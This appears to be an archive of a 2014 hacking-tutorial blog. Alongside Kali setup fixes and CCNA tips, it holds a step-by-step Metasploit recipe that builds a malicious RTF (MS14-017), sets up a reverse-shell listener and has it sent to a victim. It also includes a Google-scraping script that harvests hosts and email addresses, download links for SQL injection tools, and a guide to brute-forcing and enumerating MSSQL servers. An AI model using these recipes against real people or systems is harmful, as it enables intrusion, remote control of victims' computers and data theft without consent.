Wednesday, 11 June 2014

How to Create Kali Linux Custom ARM image For Samsung Mobile ?

- You will need to use the cross compilers from  github 

armel images (RPi) will use https://github.com/offensive-security/gcc-arm-eabi-linaro-4.6.2

armhf images will use https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7

A sample workflow would look similar to (armhf):

Steps:-

1.open Terminal Type The following Codes:-

mkdir ~/arm-stuff

cd ~/arm-stuff

git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7

export PATH=${PATH}:/root/arm-stuff/gcc-arm-linux-gnueabihf-4.7/bin

git clone https://github.com/offensive-security/kali-arm-build-scripts

cd ~/arm-stuff/kali-arm-build-scripts

./build-deps.sh


 ./chromebook-arm-samsung.sh 1.0


If you are on 32bit, after the script finishes running, you will have an image
file located in ~/arm-stuff/kali-arm-build-scripts/chromebook-1.0/ called
kali-1.0-chromebook.img and a sha1sum file for it.  **_You will need to use your own

preferred compression if you want to distribute it._**

that's It



Thursday, 5 June 2014

How to Hack Remote Victim PC with MS Office Document ??

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a list override count field can be modified to treat one structure as another. This bug was originally seen being exploited in the wild starting in April 2014. This module was created by reversing a public malware sample.

Exploit Targets:-

Microsoft Office 2010 SP2 


Requirement:-

Attacker: kali Linux
Victim PC: Windows 7

steps :-

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms14_017_rtf

msf exploit (ms14_017_rtf)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms14_017_rtf)>set lhost 192.168.1.7 (IP of Local Host)
 
msf exploit (ms14_017_rtf)>exploit

After we successfully generate the malicious rtf File, it will stored on your local computer
/root/.msf4/local/msf.rtf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7 (lhost means local host)


exploit

Now send your msf.rtf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Video Tutorial:-

Wednesday, 4 June 2014

How To Become A Hacker : Basics Of Hacking ??


Why Programming

So the first question many people will ask is why should i learn any programming language when there are so many tools and Frameworks such as MSF (Metasploit framework) to do my job. All i need to know is how the tool works and what is the purpose of it ?. The Answer for the question is both an Yes and No, You can become a Pentester/Hacker without knowing any programming but how ever your not going to become a good pentester /Hacker.

*So Knowing Programming Will...

_Differentiate you from Script kiddies and Tool Lovers
_Help You in Understanding About Vulnerabilities
_Help You in writing Your own tools, scripts
_Help You in writing exploits, Shell codes etc
_Help You modifying Existing scripts, tools according to your needs

Which Programming Language to Learn ?

So now that you have understood the importance of knowing programming, The next question in your mind is which programming language should i learn, The answer for this question depends on your interests and goals

For Web App Pentesting /Hacking

*HTML
Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don't know HTML you should first learn it

*JAVAScript

Learning java script. Will help you understand the basics of Cross Site Scripting

*PHP/SQL

Majority of web applications are written using PHP and MySQL .So it is a must to learn PHP

For Writing / Understanding Exploits, Shell Codes, Root kits etc

*C & C++

More than 60 % of the exploits you will find on the web are written in C & C ++, Learning C & C++ will help you understand about Buffer overflows, Stack overflow etc, So learning C and C ++ is must for every hacker/Pen tester

*Assembly

Learning assembly will help you in Writing/understanding Shell codes , Will Help you in Reverse Engineering applications and software's

For Building Tools And Scripts

*Python

Python is a very powerful high level language , Its Easy to learn and code, most of the tools and scripts for automation are written in Python . Knowing Python socket programming will help you a lot in Exploit writing

*Ruby

Ruby is an another language which is used to write scripts, tools. Metasploit Frame Work is written in Ruby. so learning ruby will help you understand the in and outs of msf

*Bash

Learning Bash is very Useful in writing small scripts for automation

Hope this info helps you

HOW TO PASS CCNA CERTIFICATION ??

All people in the world of networking will be probably be familiar with CCNA and CCNP certifications.
These are global certifications awarded by CISCO.

Getting a CCNA,CCNP will definitely help you to get a better job besides getting a foothold into Professional Networking Field.
Let’s see how we can prepare ourselves in a methodological manner for CISCO exams, this article is based on CCNA.

1)RESOURCE BOOKS:

->Cisco Press book ICND 1
-> Cisco Press book ICND 2
The ICND1 covers "Network Types, Network Media, Switching Fundamentals, TCP/IP, IP Addressing and Routing, WAN Technologies, Operating and Configuring IOS Devices, and Managing Network Environments."
The ICND2 covers "Extending Switched Networks with VLANS, Determining IP Routes, Managing IP traffic with Access Lists, Establishing Point-to-Point connections, and Establishing Frame Relay Connections."
The combined CCNA covers all topics covered under the ICND1 and ICND2.


2) "31 Days Before your CCNA Exam" by CISCO

This book written by Cisco itself is a great resource for a Bible book revision type before your exams to brush up your concepts.


3)->Switch/Hub simulator(example:GNS switch emulator). 

Purchasing switches and hubs for practical hands on can be quite expensive, besides lab study at the centre, you can use a virtual simulator software emulating these at your home too.


4)->"CCNAx Exam Prep" .For practicing exams at home

This book will give you an exam outline and how to go about for the exams..
Best of luck :|]

Sunday, 1 June 2014

How to fix PAE error In virtual Box ?

//Eroor:


A fatal error has occurred during virtual machine execution! The virtual machine will be powered off. Please copy the following error message using the clipboard to help diagnose the problem:
The guest is trying to switch to the PAE mode which is currently disabled by default in VirtualBox. PAE support can be enabled using the VM settings (System/Processor).
Error ID: PAEmode
Severity: Fatal Error


// Fix:-open virtualbox>settings>system>go to "processer ">check "Enable PAE/NX ">click OK 

that's it

restart virtualbox


Tuesday, 27 May 2014

Top 10 SQL injection Tools for hackers and pentesters :-

10 Powerful SQL Injection Tools That Penetration Testers Can Use

1. BSQL Hacker

This is a useful tool for both experts and beginners that automates SQL Injection attacks on websites.

Download: http://flexydrive.com/q75te2c2banl

2. The Mole

This is an SQL Injection tool that uses the union technique or the boolean query-based technique.

Download: http://flexydrive.com/3pr6tjhb0b8p

3. Pangolin

This is a penetration testing tool developed by NOSEC. It is aimed at detecting and exploiting SQL injection vulnerabilities on websites.

Download: http://flexydrive.com/i6sq1d5i6ysd

4. Sqlmap

This is an open source penetration testing tool that security professionals can use. Like the BSQL Hacker tool, this one also automates SQL Injection attacks.

Download: http://flexydrive.com/yrc3szqgr9i0

5. Havij

This is an automated SQL injection tool that can be used by penetration testers in order to detect vulnerabilities in web applications and exploit them.

Download: http://flexydrive.com/t2j5ymthhlss

6. Enema SQLi

This is a dynamic penetration testing tool for professionals. It is an auto-hacking software.

Download: http://flexydrive.com/qyxp8tk2m85z

7. Sqlninja

This is a tool targeted at exploiting SQL injection vulnerabilities. It uses the Microsoft SQL server as its back end.

Download: http://flexydrive.com/2wp50o3ojbii

8. sqlsus

Written using the Perl programming language, this is an open source penetration testing tool for MySQL Injection and takeover.

Download: http://flexydrive.com/tyn0mmznl7e5

9. Safe3 SQL Injector

This is a powerful penetration testing tool, which automates the process of detecting and exploiting SQL Injection vulnerabilities.

Download: http://flexydrive.com/6rl4s64fug7i

10. SQL Poizon

This tool includes php , asp , rfi , lf dorks that can be used for penetration testing.

Download: http://flexydrive.com/o29h5b7p5221

error solved :- installation of sun oracle virtual box on kali linux .

// The main error is to installation of dkms (Dinamically kernel modual system)

now how to install this dkms on kali linux

// it is very easy

 open terminal and type the following code :-

    apt-get install dkms 

that's it 


Saturday, 24 May 2014

shell script:goohost.sh

#!/bin/bash
###########################################################################
# Simple script that tries to extracts hosts, subdomains, ip and mail from
# a Google search against a specif domain or Google scraping if you prefere!
# License: GPLv3
# Name: goohost
# Author: watakushi
# Special thanks to: kartik & kamal \n \n"
###########################################################################


###########################################################################
# General stuff - usage - errors - parameters definition
#


let I=0 #Used in the while loop's Google queries
METHOD="host" #Default mode is set to host
let PAGES=5 #Default pages to download from Google
let VERBOSITY=0 #Verbosity is set to off as default
TMPRND=$RANDOM #Random number used for temporany files
REGEXPRESULT='Results <b>[0-9,]*</b> - <b>[0-9,]*</b> of[" about "]+<b>[0-9,]*</b>' #REGEXP for extraxct the number of results from a query
METHOD=host #Default method set to host

#Print the help banner and exit the script
printhelpanddie () {
   printf "\n"
   printf "[*] goohost v.0.0.1 Beta \n"
   printf "[*] Simple script that extracts hosts/subdomains, ip or emails for a specific domain with Google search \n"
   printf "[*] Author: watakushi \n"
   printf "[*] Thanks to: Johnny Long and GHDB for inspiration stuff \n"
   printf "[*] Special thanks to: Danya & Roberto \n \n"
   printf "[*] Usage: $0 -t domain.tld [-m <host|ip|mail> -p <1-20> -v] \n \n"
   printf "[*] -t: target domain. Ex: backtrack.linux.org \n"
   printf "[*] -m: method: <ip|host|mail>. Default value is set to host \n"
   printf "[*]             host: raw google hosts and subdomains search \n"
   printf "[*]             ip: raw google hosts and subdomains search and performs a reverse DNS resolution \n"
   printf "[*]             mail:raw google email search \n"
   printf "[*] -p: pages [1-20]. Max number of pages to download from Google. Default 5 \n"
   printf "[*] -v: verbosity. Default is set to off \n"
   printf "[*] Example: $0 -t backtrack-linux.com -m ip -p 10 -v \n \n"
   exit 1
   }

#Extract the number of results google gives from the query
getresult () {
   RESULT=$(grep -Eio "$REGEXPRESULT" /tmp/goohost$I-$TMPRND.log | cut -d"<" -f 6 | cut -d">" -f 2| tr -d ",")
   return $RESULT
   }


while getopts "t:m:p:v" optname
  do
    case "$optname" in
      "t")
        DOMAIN=$OPTARG
        ;;
      "m")
        METHOD=$OPTARG
        ;;
      "p")
        let PAGES=$OPTARG
        ;;
      "v")
        let VERBOSITY=1
        ;;
      "?")
        echo "[!] Error: Unknown option!"
        printhelpanddie
        ;;
      ":")
        echo "[!] Error: Argument needed!"
        printhelpanddie
        ;;
      *)
        echo "[!] Error: Unknown error!!!"
        printhelpanddie
        ;;
    esac
  done


#Check for write permissions and several tools used in the script
if [ ! -x /usr/bin/wget ]; then
  echo "[!] Error: /usr/bin/wget not found on this system!" 1>&2
  exit 1
fi

if [ ! -x /usr/bin/awk ]; then
  echo "[!] Error: /usr/bin/awk not found on this system!" 1>&2
  exit 1
fi

if [ ! -x /bin/sed ]; then
  echo "[!] Error: /bin/sed not found on this system!" 1>&2
  exit 1
fi

if [ ! -w /tmp ]; then
  echo "[!] Error: Can't write in /tmp ! - Permission denied" 1>&2
  exit 1
fi

if [ ! -w ./ ]; then
  echo "[!] Error: Can't write in ./ ! - Permission denied" 1>&2
  exit 1
fi

#Print usage if parameters are not passed to the script
if [[ -z $DOMAIN ]] || [[ $METHOD != host && $METHOD != ip && $METHOD != mail  ]] ; then

   printhelpanddie

fi

#Use a regular expression based on the method option
case "$METHOD" in

   host)
      REGEXPQUERY='[a-zA-Z0-9\._-]+\.'$DOMAIN
   ;;

   ip)
      REGEXPQUERY='[a-zA-Z0-9\._-]+\.'$DOMAIN
   ;;

   mail)
      REGEXPQUERY="[a-zA-Z0-9._-]+@<em>$DOMAIN</em>"
      QEMAIL="+$DOMAIN"
   ;;

esac


#Set the number of queries to do. Default value 5.
if [[ $PAGES -lt 1 || $PAGES -gt 20 ]] ; then
   echo "[-] Warning: Pages value not in the range 1-20. Default value used!" 1>&2
   let PAGES=5
   printf "\n"
fi

#Check for DNS wildcards
if [[ $(host idontexist.xxxxx$TMPRND.com | grep address) ]]; then
   printf "\n"
   echo "[-] Warning: DNS wildcard detected! With IP method you should have some false positive results." 1>&2
   printf "\n"
fi


###########################################################################
# QUERY:0  Download the first google page with the site: parameter
#

#Google Query
case "$METHOD" in

   host)
      GOOGLEQUERY0="http://www.google.com/search?num=100&q=site%3A$DOMAIN" #site:example.tld
   ;;

   ip)
      GOOGLEQUERY0="http://www.google.com/search?num=100&q=site%3A$DOMAIN" #site:example.tld
   ;;

   mail)
      GOOGLEQUERY0="http://www.google.com/search?num=100&q=site%3A$DOMAIN$QEMAIL" #example.tld site:example.tld
   ;;

esac

#Download with wget the page
wget -U "" "$GOOGLEQUERY0" -O /tmp/goohost$I-$TMPRND.log -q


#Extract the hosts/emails and save in the result file
grep -Eio $REGEXPQUERY  /tmp/goohost$I-$TMPRND.log > result-$TMPRND.log

#Extract the number of results google gives from the query
getresult

#Verbosity
if [ "$VERBOSITY" = "1" ]; then
   printf "\n"
   printf "Google Query n.$I \n"
   echo $GOOGLEQUERY0
   printf "\n"
   printf "Results for query: $RESULT \n"
   printf "\n"

fi

###########################################################################
# Start the loop, download the pages generated with different types of query
#

while [[ "$RESULT" -ge "100"  &&  "$I" -lt $PAGES-1 ]]
do

   let I=I+1

   case "$I" in

      1)
         #Google Query
         case "$METHOD" in

            host)
               GOOGLEQUERY1="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3Awww.$DOMAIN" #site:example.tld -inurl:www.example.tld
            ;;

            ip)
               GOOGLEQUERY1="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3Awww.$DOMAIN" #site:example.tld -inurl:www.example.tld
            ;;

            mail)
               GOOGLEQUERY1="http://www.google.com/search?num=100&q=site%3A$DOMAIN$QEMAIL+mail" #site:example.tld example.tld mail
            ;;

         esac

         #Download with wget the page
         wget -U "" "$GOOGLEQUERY1" -O /tmp/goohost$I-$TMPRND.log -q

         #Extract the hosts/emails and save in the result file
         grep -Eio $REGEXPQUERY /tmp/goohost$I-$TMPRND.log  >> result-$TMPRND.log

         #Extract the number of results google gives from the query
         getresult

         #Verbosity
         if [ "$VERBOSITY" = "1" ]; then
            printf "\n"
            printf "Google Query n.$I \n"
            echo $GOOGLEQUERY1
            printf "\n"
            printf "Results for query: $RESULT \n"
            printf "\n"
         fi

         ;;

      2)

         #Google Query
         case "$METHOD" in

            host)
               GOOGLEQUERY2="http://www.google.com/search?num=100&q=*.site%3A$DOMAIN+-inurl%3Awww.$DOMAIN" #site:example.tld -inurl:www.example.tld
            ;;

            ip)
               GOOGLEQUERY2="http://www.google.com/search?num=100&q=*.site%3A$DOMAIN+-inurl%3Awww.$DOMAIN" #site:example.tld -inurl:www.example.tld
            ;;

            mail)
               GOOGLEQUERY2="http://www.google.com/search?num=100&q=$site%3A$DOMAIN$QEMAIL+mail&start=200" #site:example.tld example.tld mail
            ;;

         esac

         #Download with wget the page
         wget -U "" "$GOOGLEQUERY2" -O /tmp/goohost$I-$TMPRND.log -q

         #Extract the hosts/emails and save in the result file
         grep -Eio $REGEXPQUERY /tmp/goohost$I-$TMPRND.log  >> result-$TMPRND.log

         #Extract the number of results google gives from the query
         getresult

         #Verbosity
         if [ "$VERBOSITY" = "1" ]; then
            printf "\n"
            printf "Google Query n.$I \n"
            echo $GOOGLEQUERY2
            printf "\n"
            printf "Results for query: $RESULT \n"
            printf "\n"
         fi


         # Generate TOP6 file and pass the values to the next queries
         case "$METHOD" in

            host)
               grep -Eio $REGEXPQUERY result-$TMPRND.log | sort | uniq -i -c | sort -n -r |  grep -Eio $REGEXPQUERY | sed -e "s/.$DOMAIN//g" > /tmp/top6-$TMPRND.log
            ;;

            ip)
               grep -Eio $REGEXPQUERY result-$TMPRND.log | sort | uniq -i -c | sort -n -r |  grep -Eio $REGEXPQUERY | sed -e "s/.$DOMAIN//g" > /tmp/top6-$TMPRND.log
            ;;

            mail)
               grep -Eio $REGEXPQUERY result-$TMPRND.log | sort | uniq -i -c | sort -n -r |  grep -Eio $REGEXPQUERY | cut -d"@" -f1 > /tmp/top6-$TMPRND.log
            ;;

         esac

         ;;

      3)

         CURL1=$(awk NR==1 /tmp/top6-$TMPRND.log)
         CURL2=$(awk NR==2 /tmp/top6-$TMPRND.log)
         CURL3=$(awk NR==3 /tmp/top6-$TMPRND.log)
         CURL4=$(awk NR==4 /tmp/top6-$TMPRND.log)
         CURL5=$(awk NR==5 /tmp/top6-$TMPRND.log)
         CURL6=$(awk NR==6 /tmp/top6-$TMPRND.log)

         #Google Query
         case "$METHOD" in

            host)
               GOOGLEQUERY3="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3A$CURL1+-inurl%3A$CURL2+-inurl%3A$CURL3+-inurl%3A$CURL4+-inurl%3A$CURL5+-inurl%3A$CURL6" #site:example.tlf -inurl:top1 -inurl:top2 -inurl:top3 -inurl:top4 -inurl:top5 -inurl:top6
            ;;

            ip)
               GOOGLEQUERY3="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3A$CURL1+-inurl%3A$CURL2+-inurl%3A$CURL3+-inurl%3A$CURL4+-inurl%3A$CURL5+-inurl%3A$CURL6" #site:example.tlf -inurl:top1 -inurl:top2 -inurl:top3 -inurl:top4 -inurl:top5 -inurl:top6
            ;;

            mail)
               GOOGLEQUERY3="http://www.google.com/search?num=100&q=$QEMAILsite%3A$DOMAIN+-intext%3A$CURL1+-intext%3A$CURL2+-intext%3A$CURL3+-intext%3A$CURL4+-intext%3A$CURL5+-intext%3A$CURL6" #site:example.tlf -intext:info
            ;;

         esac

         #Download with wget the page
         wget -U  "" "$GOOGLEQUERY3" -O /tmp/goohost$I-$TMPRND.log -q

         #Extract the hosts/emails and save in the result file
         grep -Eio $REGEXPQUERY /tmp/goohost$I-$TMPRND.log >> result-$TMPRND.log

         #Extract the number of results google gives from the query
         getresult

         #Verbosity
         if [ "$VERBOSITY" = "1" ]; then
            printf "\n"
            printf "Google Query n.$I \n"
            echo $GOOGLEQUERY3
            printf "\n"
            printf "Result for query: $RESULT \n"
            #print the top 6 host from result-$TMPRND.log
            printf "The TOP6 are: \n"
            printf "$CURL1 $CURL2 $CURL3 $CURL4 $CURL5 $CURL6"
            printf "\n"
         fi

         ;;

      4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 )

         let START=($I-3)*100 #Google query top6 changed the start parameter

         #Google Query
         case "$METHOD" in

            host)
               GOOGLEQUERY3="http://www.google.com/search?num=100&start=$START&q=site%3A$DOMAIN+-inurl%3A$CURL1+-inurl%3A$CURL2+-inurl%3A$CURL3+-inurl%3A$CURL4+-inurl%3A$CURL5+-inurl%3A$CURL6" #site:example.tlf -inurl:top1 -inurl:top2 -inurl:top3 -inurl:top4 -inurl:top5 -inurl:top6
            ;;

            ip)
               GOOGLEQUERY3="http://www.google.com/search?num=100&start=$START&q=site%3A$DOMAIN+-inurl%3A$CURL1+-inurl%3A$CURL2+-inurl%3A$CURL3+-inurl%3A$CURL4+-inurl%3A$CURL5+-inurl%3A$CURL6" #site:example.tlf -inurl:top1 -inurl:top2 -inurl:top3 -inurl:top4 -inurl:top5 -inurl:top6
            ;;

            mail)
               GOOGLEQUERY3="http://www.google.com/search?num=100&start=$START&q=$QEMAILsite%3A$DOMAIN+-intext%3A$CURL1+-intext%3A$CURL2+-intext%3A$CURL3+-intext%3A$CURL4+-intext%3A$CURL5+-intext%3A$CURL6" #site:example.tlf -intext:info
            ;;

         esac

         #Download with wget the page
         wget -U  "" "$GOOGLEQUERY3" -O /tmp/goohost$I-$TMPRND.log -q

         #Extract the hosts/emails and save in the result file
         grep -Eio $REGEXPQUERY /tmp/goohost$I-$TMPRND.log >> result-$TMPRND.log

         #Extract the number of results google gives from the query
         getresult

         #Check how many pages to download with this query
         let END=($RESULT/100) #Number of page to download

         if [[ $I -ge $END+3 ]]; then
            let I=12
         fi


         #Verbosity
         if [ "$VERBOSITY" = "1" ]; then
            printf "\n"
            printf "Google Query n.$I \n"
            echo $GOOGLEQUERY3
            printf "\n"
            printf "Result for query: $RESULT \n"
            #print the top 6 host from result-$TMPRND.log
            printf "The TOP6 are: \n"
            printf "$CURL1 $CURL2 $CURL3 $CURL4 $CURL5 $CURL6"
            printf "\n"

         fi

         ;;


      13)

         #Generate temporary file for the random query
         case "$METHOD" in

            host)
               sort -u result-$TMPRND.log | sed -e "s/.$DOMAIN//g" > /tmp/random-$TMPRND.log
            ;;

            ip)
               sort -u result-$TMPRND.log | sed -e "s/.$DOMAIN//g" > /tmp/random-$TMPRND.log
            ;;

            mail)
               sort -u result-$TMPRND.log | cut -d"@" -f1 > /tmp/random-$TMPRND.log
            ;;

         esac

         highest=$(wc -l /tmp/random-$TMPRND.log | cut -d" " -f1 ) #Number of hosts present in the result file

         #################################################
         #TODO: Exit from the case loop if highest is <= 0
         #################################################
         if [[ $highest -ge "1" ]]; then
            R1=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
            R2=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
            R3=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
            R4=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
            R5=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
            R6=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]

            RURL1="$(awk "NR==$R1" /tmp/random-$TMPRND.log)"
            RURL2="$(awk "NR==$R2" /tmp/random-$TMPRND.log)"
            RURL3="$(awk "NR==$R3" /tmp/random-$TMPRND.log)"
            RURL4="$(awk "NR==$R4" /tmp/random-$TMPRND.log)"
            RURL5="$(awk "NR==$R5" /tmp/random-$TMPRND.log)"
            RURL6="$(aewk "NR==$R6" /tmp/random-$TMPRND.log)"


            #Google Query
            case "$METHOD" in

               host)
                  GOOGLEQUERY4="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3A$RURL1+-inurl%3A$RURL2+-inurl%3A$RURL3+-inurl%3A$RURL4+-inurl%3A$RURL5+-inurl%3A$RURL6" #site:example.tlf -inurl:random1 -inurl:random2 -inurl:random3 -inurl:random4 -inurl:random5 -inurl:random6
               ;;

               ip)
                  GOOGLEQUERY4="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3A$RURL1+-inurl%3A$RURL2+-inurl%3A$RURL3+-inurl%3A$RURL4+-inurl%3A$RURL5+-inurl%3A$RURL6" #site:example.tlf -inurl:random1 -inurl:random2 -inurl:random3 -inurl:random4 -inurl:random5 -inurl:random6
               ;;

               mail)
                  GOOGLEQUERY4="http://www.google.com/search?num=100&q=$QEMAILsite%3A$DOMAIN+-intext%3A$RURL1+-intext%3A$RURL2+-intext%3A$RURL3+-intext%3A$RURL4+-intext%3A$RURL5+-intext%3A$RURL6" #site:example.tlf example.tld -itext:random1 -intext:random2 -intext:random3 -intext:random4 -intext:random5 -intext:random6
               ;;

            esac

            #Download with wget the page
            wget -U  "" "$GOOGLEQUERY4" -O /tmp/goohost$I-$TMPRND.log -q

            #Extract the hosts/emails and save in the result file
            grep -Eio $REGEXPQUERY /tmp/goohost$I-$TMPRND.log >> result-$TMPRND.log

            #Extract the number of results google gives from the query
            getresult

            #Verbosity
            if [ "$VERBOSITY" = "1" ]; then
               printf "\n"
               printf "Google Query n.$I \n"
               echo $GOOGLEQUERY4
               printf "\n"
               printf "Result for query: $RESULT \n"
               printf "Random hosts: $RURL1 $RURL2 $RURL3 $RURL4 $RURL5 $RURL6 \n"
               printf "\n"
            fi

         else
            let I=20
         fi

         ;;

      14 | 15 | 16 | 17 | 18 | 19)

         R1=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
         R2=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
         R3=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
         R4=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
         R5=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]
         R6=$[ ( $RANDOM % ( $[ $highest - 1 ] + 1 ) ) + 1 ]

         RURL1="$(awk "NR==$R1" /tmp/random-$TMPRND.log)"
         RURL2="$(awk "NR==$R2" /tmp/random-$TMPRND.log)"
         RURL3="$(awk "NR==$R3" /tmp/random-$TMPRND.log)"
         RURL4="$(awk "NR==$R4" /tmp/random-$TMPRND.log)"
         RURL5="$(awk "NR==$R5" /tmp/random-$TMPRND.log)"
         RURL6="$(awk "NR==$R6" /tmp/random-$TMPRND.log)"

         #Google Query
         case "$METHOD" in

            host)
               GOOGLEQUERY4="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3A$RURL1+-inurl%3A$RURL2+-inurl%3A$RURL3+-inurl%3A$RURL4+-inurl%3A$RURL5+-inurl%3A$RURL6" #site:example.tlf -inurl:random1 -inurl:random2 -inurl:random3 -inurl:random4 -inurl:random5 -inurl:random6
            ;;

            ip)
               GOOGLEQUERY4="http://www.google.com/search?num=100&q=site%3A$DOMAIN+-inurl%3A$RURL1+-inurl%3A$RURL2+-inurl%3A$RURL3+-inurl%3A$RURL4+-inurl%3A$RURL5+-inurl%3A$RURL6" #site:example.tlf -inurl:random1 -inurl:random2 -inurl:random3 -inurl:random4 -inurl:random5 -inurl:random6
            ;;

            mail)
               GOOGLEQUERY4="http://www.google.com/search?num=100&q=$QEMAILsite%3A$DOMAIN+-intext%3A$RURL1+-intext%3A$RURL2+-intext%3A$RURL3+-intext%3A$RURL4+-intext%3A$RURL5+-intext%3A$RURL6" #site:example.tlf example.tld -itext:random1 -intext:random2 -intext:random3 -intext:random4 -intext:random5 -intext:random6
            ;;

         esac

         #Download with wget the page
         wget -U  "" "$GOOGLEQUERY4" -O /tmp/goohost$I-$TMPRND.log -q

         #Extract the hosts/emails and save in the result file
         grep -Eio $REGEXPQUERY /tmp/goohost$I-$TMPRND.log >> result-$TMPRND.log

         #Extract the number of results google gives from the query
         getresult

         #Verbosity
         if [ "$VERBOSITY" = "1" ]; then
            printf "\n"
            printf "Google Query n.$I \n"
            echo $GOOGLEQUERY4
            printf "\n"
            printf "Result for query: $RESULT \n"
            #print the top 6 host from result-$TMPRND.log
            printf "Random hosts: $RURL1 $RURL2 $RURL3 $RURL4 $RURL5 $RURL6 \n"
            printf "\n"
         fi

         ;;

   esac

done

###########################################################################
# Generate output and report file
#


#Generate different report for different methods
case "$METHOD" in

   host)

      printf "\n"
      cat result-$TMPRND.log | sort -u > report-$TMPRND-$DOMAIN.txt
      printf "Results saved in file report-$TMPRND-$DOMAIN.txt \n"
      printf "$(wc -l report-$TMPRND-$DOMAIN.txt | cut -d" " -f1) results found! \n"
      ;;

   ip)

      printf "\n"
      for line in $(cat result-$TMPRND.log | sort -u); do
         host $line | grep "has address" | cut -d" " -f1,4 >> report-$TMPRND-$DOMAIN.txt &
      done
      printf "Results saved in file report-$TMPRND-$DOMAIN.txt \n"
      #printf "$(wc -l report-$TMPRND-$DOMAIN.txt | cut -d" " -f1) results found! \n"
      ;;

   mail)

      printf "\n"
      cat result-$TMPRND.log | sort -u | sed -e "s/<[^>]*>//g"  > report-$TMPRND-$DOMAIN.txt
      printf "Results saved in file report-$TMPRND-$DOMAIN.txt \n"
      printf "$(wc -l report-$TMPRND-$DOMAIN.txt | cut -d" " -f1) results found! \n"
      ;;

esac

###########################################################################
# Delete temporary files
#

rm -f result-$TMPRND.log 2> /dev/null
rm -f /tmp/goohost*-$TMPRND.log 2> /dev/null
rm -f /tmp/random-$TMPRND.log 2> /dev/null
rm -f /tmp/top6-$TMPRND.log 2> /dev/null

save this script as .sh that's it

Tuesday, 20 May 2014

How to Take ScreenShot in backtrack or Ubuntu ??


//Firstly

Open terminal  then type

    apt-get install gnome-utils

This will install gnome utility like scrennshot etc .

that's it now when u press print screen from key board u can take scennshot of your screen

Sunday, 18 May 2014

How to install Empathy Messenger 2.32.2 On Backtrack and Kali or Ubuntu ??

// Type the following in terminal to install latest version of Empathy

1. sudo add-apt-repository ppa:telepathy/ppa

then

2. sudo apt-get update && sudo apt-get upgrade

then

3.sudo apt-get install empathy
 
that's it  



Thursday, 15 May 2014

apt-get update problem solved on kali linux

When U going To update Kali linux U get The following error it should Look like Following :
         
            E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable)
            E: Unable to lock directory /var/lib/apt/lists/
         
How to Solve This :

You Need To Remove Lock file From /var/lib/apt/lists/lock

so first

open terminal navigate to /var/lib/apt/lists/lock 

then

type rm /var/lib/apt/lists/lock/lock to remove lock file

that's it

Now Type

apt-get update 

kali start updating 

How To Penetrate SQL Servers ? ?

It is quite common to discover a Microsoft SQL server in a penetration testing engagement as many companies are having Windows environments. SQL servers are generally running on port 1433 but it can be found and in other ports as well.Since it’s a very popular database we have to know all the step and methods in order to conduct the database assessment efficiently.In this article we will examine step by step how we can perform penetration tests against SQL Servers.

As we have already mentioned SQL servers are running by default on port 1433.However in some cases they can be found on a different port.So how can we identify the existence of an SQL server on a system?The answer is through the SQL server browser service which runs on UDP port 1434.This service can provide us with the instance name,the version number and the exact port that the database is running.A UDP Nmap scan must be performed in order to discover these information as it can be seen from the next image:

// SQL Server Discovery – Nmap 
http://pentestlab.files.wordpress.com/2013/03/screenshot-2.png 


Another tool that can help us to discover SQL servers on remote hosts is the metasploit module mssql_ping.The information that we can obtain from this module is actually the same as the Nmap UDP scan that we executed before but it will also returns and the pipe name.

// Metasploit – mssql ping 
 Metasploit - mssql ping

From the version we can understand also that the database is SQL 2000.If it was the 9th version then the database would be 2005 etc. 


//Credentials

This is the most important part as if we manage to obtain somehow valid credentials we can connect directly through the database and we can start to extract data.Some common locations that we can discover database credentials are the following:

  • XML files (looking for connection strings)
  • SQL Injection (requires an application vulnerable to SQL injection that is running with high privileges)
  • Windows Shares
  • Developer Workstations (in case that we compromise them)
If we don’t have already discovered an account on some of the above locations then we can try a brute force attack.Metasploit Framework contains a module specifically for this task that can assist us.

auxiliary/scanner/mssql/mssql_login 
Brute Forcing MS SQL Passwords with Metasploit 

 As we have seen from the results above we have discovered that the SQL Server doesn’t contain a password for the sa account.It is also very common for database administrators to use as a password the username or any other simple passwords like company’s name etc. 

Post Exploitation
Now that we have the credentials we can use a variety of other metasploit modules that will allow us to discover more information about the database.The first module is the mssql_enum which it will perform multiple security checks against the SQL Server.These checks can assist us to conduct further post exploitation activities against the database.The next three images are showing what kind of information we can harvest from this module:


//MS-SQL Enumeration

MS-SQL Enumeration

//MS-SQL Enumeration 2
MS-SQL Enum 2

// MS-SQL Enumeration 3
MS-SQL Enumeration 3


From the above output we can spot the following:
  • xp_cmdshell is enabled
  • sa account doesn’t contain a password
  • System and Windows Logins
